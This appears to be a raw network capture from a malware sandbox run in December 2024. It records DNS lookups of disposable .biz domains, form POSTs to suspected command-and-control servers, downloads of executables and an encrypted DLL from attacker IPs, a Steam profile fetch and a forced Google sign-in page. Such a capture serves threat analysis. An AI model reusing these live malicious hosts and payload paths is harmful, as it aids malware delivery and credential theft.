Connection: keep-alive
-
Remote address:8.8.8.8:53Requestse-blurry.bizIN AResponse
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6FCB1VS0ZU37YM79ZUS0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VAI58YM7QQ9ZMYCT26FC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1VKX4WLNYCBAIMGLF37G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 300
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestzinc-sneark.bizIN AResponse
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6XLX4W47GVAAIE3WBIMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /well/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:24 GMT
Content-Type: application/octet-stream
Content-Length: 970240
Last-Modified: Thu, 12 Dec 2024 23:07:55 GMT
Connection: keep-alive
ETag: "675b6ccb-ece00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /steam/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:27 GMT
Content-Type: application/octet-stream
Content-Length: 1795072
Last-Modified: Thu, 12 Dec 2024 23:09:14 GMT
Connection: keep-alive
ETag: "675b6d1a-1b6400"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /off/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:31 GMT
Content-Type: application/octet-stream
Content-Length: 2838016
Last-Modified: Thu, 12 Dec 2024 23:08:21 GMT
Connection: keep-alive
ETag: "675b6ce5-2b4e00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestdwell-exclaim.bizIN AResponse
-
Remote address:8.8.8.8:53Requestformy-spill.bizIN AResponse
-
Remote address:8.8.8.8:53Requestcovery-mover.bizIN AResponsecovery-mover.bizIN A104.21.58.186covery-mover.bizIN A172.67.206.64
-
Remote address:104.21.58.186:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kbc0h54668srqs99p2vol4odda; expires=Mon, 07-Apr-2025 17:54:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAGoospFkgNKvYKvkPtiR2S7itHzge8IjItLI0BH26BdMC%2B0pFhvN2ddep2OtYLOf3UxAqhMY%2BUXabjXM9WKr6OaE6q4Rt0ZH8XXHFWfi4%2BhXEnzxWUd%2FxQXDKZuRnzsUWiJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f11b6cd0eb060e8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=28285&min_rtt=27150&rtt_var=7517&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=584&delivery_rate=129608&cwnd=252&unsent_bytes=0&cid=ede52f6f98c3e128&ts=234&x=0"
-
Remote address:8.8.8.8:53Requestdare-curbys.bizIN AResponse
-
Remote address:8.8.8.8:53Requestdare-curbys.bizIN AResponse
-
Remote address:185.215.113.206:80RequestGET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.206:80RequestPOST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestprint-vexer.bizIN AResponse
-
Remote address:8.8.8.8:53Requestyoutube.comIN AResponseyoutube.comIN A172.217.18.206
-
Remote address:8.8.8.8:53Requestspocs.getpocket.comIN AResponsespocs.getpocket.comIN CNAMEprod.ads.prod.webservices.mozgcp.netprod.ads.prod.webservices.mozgcp.netIN A34.117.188.166
-
Remote address:8.8.8.8:53Requestgetpocket.cdn.mozilla.netIN AResponsegetpocket.cdn.mozilla.netIN CNAMEgetpocket-cdn.prod.mozaws.netgetpocket-cdn.prod.mozaws.netIN CNAMEprod.pocket.prod.cloudops.mozgcp.netprod.pocket.prod.cloudops.mozgcp.netIN A34.120.5.221
-
Remote address:172.217.18.206:443RequestGET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
GEThttps://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwdfirefox.exeRemote address:172.217.18.206:443RequestGET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: YSC=TFrx57vzYjQ
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
GEThttps://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30firefox.exeRemote address:34.120.5.221:443RequestGET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"53a0-pN9JStWPWItMnxI0JH+7qixNT6k"
te: trailers
-
Remote address:8.8.8.8:53Requestprod.ads.prod.webservices.mozgcp.netIN AResponseprod.ads.prod.webservices.mozgcp.netIN A34.117.188.166
-
Remote address:8.8.8.8:53Requestyoutube.comIN AResponseyoutube.comIN A172.217.18.206
-
Remote address:8.8.8.8:53Requestprod.ads.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestyoutube.comIN AAAAResponseyoutube.comIN AAAA2a00:1450:4007:805::200e
-
Remote address:8.8.8.8:53Requestyoutube.comIN AAAA
-
Remote address:8.8.8.8:53Requestyoutube.comIN AAAA
-
Remote address:8.8.8.8:53Requestprod.pocket.prod.cloudops.mozgcp.netIN AResponseprod.pocket.prod.cloudops.mozgcp.netIN A34.120.5.221
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AResponseshavar.prod.mozaws.netIN A54.213.181.160shavar.prod.mozaws.netIN A35.85.93.176shavar.prod.mozaws.netIN A44.228.225.150
-
Remote address:8.8.8.8:53Requestprod.pocket.prod.cloudops.mozgcp.netIN AAAAResponseprod.pocket.prod.cloudops.mozgcp.netIN AAAA2600:1901:0:524c::
-
Remote address:8.8.8.8:53Requestprod.pocket.prod.cloudops.mozgcp.netIN AAAA
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AAAA
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AAAA
-
Remote address:8.8.8.8:53Requestimpend-differ.bizIN AResponse
-
Remote address:8.8.8.8:53Requestimpend-differ.bizIN A
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN A34.160.144.191
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN A
-
Remote address:23.214.143.155:443RequestGET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 13 Dec 2024 00:07:35 GMT
Content-Length: 35598
Connection: keep-alive
Set-Cookie: sessionid=cf492805cfc5dae4a4940e07; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:8.8.8.8:53Requestfirefox-settings-attachments.cdn.mozilla.netIN AResponsefirefox-settings-attachments.cdn.mozilla.netIN CNAMEattachments.prod.remote-settings.prod.webservices.mozgcp.netattachments.prod.remote-settings.prod.webservices.mozgcp.netIN A34.117.121.53
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AResponseprod.remote-settings.prod.webservices.mozgcp.netIN A34.149.100.209
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestattachments.prod.remote-settings.prod.webservices.mozgcp.netIN AResponseattachments.prod.remote-settings.prod.webservices.mozgcp.netIN A34.117.121.53
-
Remote address:8.8.8.8:53Requestattachments.prod.remote-settings.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAAResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAA2600:1901:0:92a9::
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A216.58.214.174youtube-ui.l.google.comIN A216.58.215.46youtube-ui.l.google.comIN A172.217.20.174youtube-ui.l.google.comIN A172.217.18.206youtube-ui.l.google.comIN A216.58.214.78youtube-ui.l.google.comIN A142.250.75.238youtube-ui.l.google.comIN A142.250.201.174youtube-ui.l.google.comIN A142.250.179.78youtube-ui.l.google.comIN A142.250.178.142youtube-ui.l.google.comIN A142.250.179.110youtube-ui.l.google.comIN A142.250.74.238youtube-ui.l.google.comIN A172.217.20.206
-
Remote address:8.8.8.8:53Requestyoutube-ui.l.google.comIN AResponseyoutube-ui.l.google.comIN A216.58.215.46youtube-ui.l.google.comIN A172.217.20.206youtube-ui.l.google.comIN A172.217.18.206youtube-ui.l.google.comIN A142.250.179.78youtube-ui.l.google.comIN A216.58.213.78youtube-ui.l.google.comIN A142.250.179.110youtube-ui.l.google.comIN A172.217.20.174youtube-ui.l.google.comIN A216.58.214.78youtube-ui.l.google.comIN A142.250.75.238youtube-ui.l.google.comIN A142.250.74.238youtube-ui.l.google.comIN A216.58.214.174youtube-ui.l.google.comIN A142.250.178.142youtube-ui.l.google.comIN A142.250.201.174
-
Remote address:8.8.8.8:53Requestyoutube-ui.l.google.comIN AAAAResponseyoutube-ui.l.google.comIN AAAA2a00:1450:4007:810::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4007:808::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4007:80e::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4007:80c::200e
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.179.110
-
GEThttps://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1firefox.exeRemote address:142.250.179.110:443RequestGET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: YSC=TFrx57vzYjQ
cookie: SOCS=CAAaBgiA8u26Bg
cookie: __Secure-YEC=CgtSdnpBSkZQMWlDbyjI9e26BjIKCgJHQhIEGgAgPg%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.179.110
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AAAAResponseconsent.youtube.comIN AAAA2a00:1450:4007:818::200e
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:172.217.20.164:443RequestGET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:8.8.8.8:53Requestwww.google.comIN AAAAResponsewww.google.comIN AAAA2a00:1450:4007:80c::2004
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.179.110
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.179.110
-
Remote address:80.82.65.70:80RequestGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /dll/key HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /dll/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 97296
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:80.82.65.70:80RequestGET /soft/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: d
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Content-Disposition: attachment; filename="dll";
Content-Length: 242176
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:80.82.65.70:80RequestGET /soft/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: s
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
